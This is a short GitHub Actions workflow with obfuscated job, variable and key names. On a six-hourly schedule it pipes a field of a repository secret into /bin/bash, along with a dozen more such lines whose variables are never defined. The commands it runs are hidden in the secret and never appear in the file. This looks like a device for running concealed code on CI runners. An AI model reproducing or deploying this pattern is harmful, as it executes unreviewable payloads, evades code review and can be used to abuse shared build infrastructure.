name: yuantuimk

on:
  workflow_dispatch:
  schedule:
    - cron: '13 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuantuimk
        env:
          xmgug3: ${{ secrets.xmgug3 }}
        run: |
          echo $xmgug3 | jq -r .glxqu65 | /bin/bash
          echo $wb1632 | jq -r .fhgn1 | /bin/bash
          echo $azg22008 | jq -r .bbj25859 | /bin/bash
          echo $iebuw532 | jq -r .l397 | /bin/bash
          echo $zeqa9 | jq -r .qh8 | /bin/bash
          echo $bez26 | jq -r .zwxg6 | /bin/bash
          echo $nyrsl74 | jq -r .xk61506 | /bin/bash
          echo $bf37348 | jq -r .rpb563 | /bin/bash
          echo $hpc05651 | jq -r .o06 | /bin/bash
          echo $u123 | jq -r .dcmyi64 | /bin/bash
          echo $abq392 | jq -r .zpzma63 | /bin/bash
          echo $a2 | jq -r .rggnd77344 | /bin/bash
          echo $s13506 | jq -r .vhy80 | /bin/bash

